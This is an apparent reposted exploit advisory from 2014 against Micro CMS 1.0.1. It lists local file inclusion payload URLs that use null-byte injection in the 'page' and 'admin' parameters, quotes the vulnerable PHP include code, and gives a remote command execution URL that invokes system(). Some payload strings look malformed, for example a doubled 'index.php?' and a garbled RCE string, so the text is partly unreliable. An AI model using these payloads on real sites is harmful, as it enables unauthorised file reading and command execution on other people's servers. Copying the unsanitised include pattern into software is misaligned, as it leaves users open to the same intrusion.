facebook facebook twitter rss

Micro CMS Multiple Vulnerability

Author: JIKO , Published: 26-04-2014
----------[exploit Debut]
[Local File Include Vulnerability]
----------[Author Info]

Name : JIKO

----------[Script Info]

Site : http://www.supersimple.org/
Download : http://www.apphp.com/downloads_free/php_microcms_101.zip
Name : Micro Cms
Version : 1.0.1

----------[exploit Info]


~[LFI]
http://path/index.php?index.php?page=FILE%00 (you need to baypass the filter)
http://path/index.php?index.php?admin=FILE%00 (you need to baypass the filter)

if (($page != "") && file_exists("page/" . $page . ".php")) {
include_once("page/" . $page .

".php");
} else if (($admin != "") &&

file_exists("admin/" . $admin . ".php")) {
include_once("admin/" . $admin

. ".php");
}
------------------------------------------------------------------

----------[exploit Debut]
[Remote Command Execute]
----------[Author Info]

Name : JIKO

----------[Script Info]

Site : http://www.supersimple.org/
Download : http://www.apphp.com/downloads_free/php_microcms_101.zip
Name : Micro Cms
Version : 1.0.1

----------[exploit Info]

~[RCE]
http://path/index.php?jiko);system((dir)=/

----------[exploit Fin]---------------

Like us on Facebook :